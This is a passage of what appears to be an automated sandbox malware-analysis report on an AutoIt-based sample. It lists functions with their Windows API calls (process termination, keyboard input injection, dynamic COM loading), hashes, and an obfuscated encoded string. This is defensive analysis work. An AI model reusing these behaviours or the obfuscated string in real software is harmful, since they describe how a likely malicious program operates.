                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0082540F
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0082541E
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0082542D
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00825437
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0082543E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: c75e9f9329cc7b1097501eca0c02f2231497ab1b913ec2a59f96725930356c44
                                                        • Instruction ID: fc70d4bec508fbbe84c7e078302c9f27c6dd636e884801ae904529346322bded
                                                        • Opcode Fuzzy Hash: c75e9f9329cc7b1097501eca0c02f2231497ab1b913ec2a59f96725930356c44
                                                        • Instruction Fuzzy Hash: 33F06D36240158BBE3215BA2DC0DEAB7A7CFBC7B11F00016DFA04D105296A01A01C6B5
                                                        Function 00827230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00827243
                                                        • EnterCriticalSection.KERNEL32(?,?,007D0EE4,?,?), ref: 00827254
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,007D0EE4,?,?), ref: 00827261
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,007D0EE4,?,?), ref: 0082726E
                                                          • Part of subcall function 00826C35: CloseHandle.KERNEL32(00000000,?,0082727B,?,007D0EE4,?,?), ref: 00826C3F
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00827281
                                                        • LeaveCriticalSection.KERNEL32(?,?,007D0EE4,?,?), ref: 00827288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: b3ebd04f5ce30f2b9a6bfa6ff259bacf14a91858a976e6f76bddd16d07f58a95
                                                        • Instruction ID: f502f3239331c30e66270b77c102415d00d75827f71d68499878597844f15da7
                                                        • Opcode Fuzzy Hash: b3ebd04f5ce30f2b9a6bfa6ff259bacf14a91858a976e6f76bddd16d07f58a95
                                                        • Instruction Fuzzy Hash: 5EF05E3A540622EBE7122B64ED4C9DB776AFF46702B100539F603910A2DBB65851CB60
                                                        Function 00818992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0081899D
                                                        • UnloadUserProfile.USERENV(?,?), ref: 008189A9
                                                        • CloseHandle.KERNEL32(?), ref: 008189B2
                                                        • CloseHandle.KERNEL32(?), ref: 008189BA
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 008189C3
                                                        • HeapFree.KERNEL32(00000000), ref: 008189CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 1c0f60026aecd9ddc2b9efbed231caec7650d607a5fe23c4c50dfa204f3471ee
                                                        • Instruction ID: 60abb88f713429a29dc0dd8e5ccc73384bb62c5f8521baffa7dd4c6ec1cae04a
                                                        • Opcode Fuzzy Hash: 1c0f60026aecd9ddc2b9efbed231caec7650d607a5fe23c4c50dfa204f3471ee
                                                        • Instruction Fuzzy Hash: FBE0527A104505FBDA021FE5EC0C95AFBA9FB8A762B508639F31981571CB329461DB50
                                                        Function 008385ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00838613
                                                        • CharUpperBuffW.USER32(?,?), ref: 00838722
                                                        • VariantClear.OLEAUT32(?), ref: 0083889A
                                                          • Part of subcall function 00827562: VariantInit.OLEAUT32(00000000), ref: 008275A2
                                                          • Part of subcall function 00827562: VariantCopy.OLEAUT32(00000000,?), ref: 008275AB
                                                          • Part of subcall function 00827562: VariantClear.OLEAUT32(00000000), ref: 008275B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 6409223569cc81c9c15a918d111a0acb2f6e6c870d943c6ae361ed60e8d47413
                                                        • Instruction ID: 2b44ef9bf5780cb8f3b9d77c484bdc985fc452b5d55c05cccc93388dbe3f3aab
                                                        • Opcode Fuzzy Hash: 6409223569cc81c9c15a918d111a0acb2f6e6c870d943c6ae361ed60e8d47413
                                                        • Instruction Fuzzy Hash: 19914371608301DFCB00DF24C48995ABBE4FF89714F14886EF99ACB262DB30E945CB92
                                                        Function 007D3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_free
                                                        • String ID: 3c}$_}
                                                        • API String ID: 2620147621-2413270705
                                                        • Opcode ID: 70225a941b7ea5841d7739918b11dab47e1e527ee872d8cd2810c6cda33c79fc
                                                        • Instruction ID: 5f944bcc8fb1a6069f3d5d715b2c5014c89625442f9edd2a34161c57084362b0
                                                        • Opcode Fuzzy Hash: 70225a941b7ea5841d7739918b11dab47e1e527ee872d8cd2810c6cda33c79fc
                                                        • Instruction Fuzzy Hash: F85158716053818FDB65CF28C840A6ABBF5FF89314F44482EE98987351EB39E951CB83
                                                        Function 007D6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: 3c}$ERCP
                                                        • API String ID: 2532777613-604919223
                                                        • Opcode ID: b003b486a4eea7d7b0bb603bb7cb8a4e71003e738498dc5bacf56179c409fa65
                                                        • Instruction ID: 161513d417028299874abdad26063f2399cd5f2c21bcff4580de49d18e259660
                                                        • Opcode Fuzzy Hash: b003b486a4eea7d7b0bb603bb7cb8a4e71003e738498dc5bacf56179c409fa65
                                                        • Instruction Fuzzy Hash: 7E518E71900309DBDB24DFA5C985BAABBF8FF48314F20856EE54AD6241E774EA848B40
                                                        Function 008497F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(00EDEDA8,?), ref: 00849863
                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00849896
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00849903
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID: 0R
                                                        • API String ID: 3880355969-1916035689
                                                        • Opcode ID: 119d1ad33f50e9a2e122c76301e089bc2960f74508831fcfa17cc1fce6b9abd0
                                                        • Instruction ID: 06c0da12396a7ebeada3b2600697b0d17c0cf51d664c6bf7023e6991a10b9225
                                                        • Opcode Fuzzy Hash: 119d1ad33f50e9a2e122c76301e089bc2960f74508831fcfa17cc1fce6b9abd0
                                                        • Instruction Fuzzy Hash: EF510B34A00209EFCB24DF68C884AAE7BB5FF56360F14816DF995DB2A0D731AD51CB90
                                                        Function 0081D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0081D5D4
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0081D60A
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0081D61B
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0081D69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: 9951516ab36c007536392d7032757b9223ad43a571b634ec1e1ea2329a1673ea
                                                        • Instruction ID: c7809c7675f19f25541aaf4954dd82e412cdc7419f4503c085520657b0c9195c
                                                        • Opcode Fuzzy Hash: 9951516ab36c007536392d7032757b9223ad43a571b634ec1e1ea2329a1673ea
                                                        • Instruction Fuzzy Hash: AA4159B2600305EFDB15CF64C884B9ABBA9FF55314F1581A9AD09DF20AD7B1D984CBA0
                                                        Function 00822753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 008227C0
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008227DC
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00822822
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00885890,00000000), ref: 0082286B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 02662a8fe8287b7e84de25658b15391396e3ac1ee74e478645df1a4a64ebeb65
                                                        • Instruction ID: ccfb8d1df1789a1ce1c2274425e14cdd71057078b9ee5b02e15e3db439b078bb
                                                        • Opcode Fuzzy Hash: 02662a8fe8287b7e84de25658b15391396e3ac1ee74e478645df1a4a64ebeb65
                                                        • Instruction Fuzzy Hash: C041AC70204351AFD724DF28E844B6ABBE8FF85314F04492DF9A6D7292DB70E845CB52
                                                        Function 00848851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008488DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: 0R
                                                        • API String ID: 634782764-1916035689
                                                        • Opcode ID: 2367d81b36df4b84baf4e2e314772b2a2e229b589568834860a9b46bd9a38694
                                                        • Instruction ID: 62cca41b8355fcc6bd83340f51228fbc5f1eecd013f72fa759298f333da76dde
                                                        • Opcode Fuzzy Hash: 2367d81b36df4b84baf4e2e314772b2a2e229b589568834860a9b46bd9a38694
                                                        • Instruction Fuzzy Hash: F031B03460050CFFEB249A68CC45FBD7FA5FB0A350F944526FA15E62A1CE70E980DB52
                                                        Function 0084AB37 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0084AB60
                                                        • GetWindowRect.USER32(?,?), ref: 0084ABD6
                                                        • PtInRect.USER32(?,?,0084C014), ref: 0084ABE6
                                                        • MessageBeep.USER32(00000000), ref: 0084AC57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID: 0R
                                                        • API String ID: 1352109105-1916035689
                                                        • Opcode ID: 1f95e5d9fbc2b082523f1c85ae438c8c4bbc61e3308267b286ede934bb82b91d
                                                        • Instruction ID: 24ef10cee0fe8b2f2afd014cef2f4ef2ca2bc701c0aba44544aebc76270f5b2b
                                                        • Opcode Fuzzy Hash: 1f95e5d9fbc2b082523f1c85ae438c8c4bbc61e3308267b286ede934bb82b91d
                                                        • Instruction Fuzzy Hash: 30418835A4021DDFCB69DF58D8C4AAABBF5FB49310F1884A9E914DF261D730A841CB92
                                                        Function 00820AD6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00820B27
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00820B43
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00820BA9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00820BFB
                                                        Strings
                                                        • dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew, xrefs: 00820B5D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID: dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew
                                                        • API String ID: 432972143-3792667901
                                                        • Opcode ID: d79907a266f36903e6c4c0ed6fe8ea771e1b9b97f98462e3befded38388055ea
                                                        • Instruction ID: 5ffe07031f248fe563deaacd7672e97f90034b3cdce625b45d39a1774f7888ba
                                                        • Opcode Fuzzy Hash: d79907a266f36903e6c4c0ed6fe8ea771e1b9b97f98462e3befded38388055ea
                                                        • Instruction Fuzzy Hash: 4F312870D4422CAEEB308B69A805BFABBA9FB45328F14425AE590D11D3C37489C19F52
                                                        Function 00820C11 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00820C66
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00820C82
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00820CE1
                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00820D33
                                                        Strings
                                                        • dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew, xrefs: 00820C9F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID: dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew
                                                        • API String ID: 432972143-3792667901
                                                        • Opcode ID: 6b025107fe63b8fe65d385c40c4b8d29d29b7a7f4a0150bd5516de585138ebf4
                                                        • Instruction ID: 42fc1ce2cfbca6cc0a3d60553a24ce7037b571c6a31fa95273924f162145c1e9
                                                        • Opcode Fuzzy Hash: 6b025107fe63b8fe65d385c40c4b8d29d29b7a7f4a0150bd5516de585138ebf4
                                                        • Instruction Fuzzy Hash: C73126B09002286EFF348B68A8047FEBBAAFB45310F54431AE580D21D3C37599C59BA2
                                                        Function 0083D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0083D7C5
                                                          • Part of subcall function 007C784B: _memmove.LIBCMT ref: 007C7899
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower_memmove
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 3425801089-567219261
                                                        • Opcode ID: 4d6dd70ccb4f10ac4607ba33f1fd1dbbc85b0abe72c1561553411a3300483c64
                                                        • Instruction ID: bb030e5c20c3921d40df98465b5620d7aa482f35269b4f76de409babca714246
                                                        • Opcode Fuzzy Hash: 4d6dd70ccb4f10ac4607ba33f1fd1dbbc85b0abe72c1561553411a3300483c64
                                                        • Instruction Fuzzy Hash: ED31BC71904209EBCF00EFA8C8559AEB3B4FF44320F008A6DE969E72D1DB75B945CB80
                                                        Function 00818E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00818F14
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00818F27
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00818F57
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        • Opcode ID: 341b5581443dbf9eb1480589627962640748f8c64a3798ab118119002ef23755
                                                        • Instruction ID: 3708530ad6a2524454cc691d507670fa4987abb8a05b6404ed3bf95f300ddea1
                                                        • Opcode Fuzzy Hash: 341b5581443dbf9eb1480589627962640748f8c64a3798ab118119002ef23755
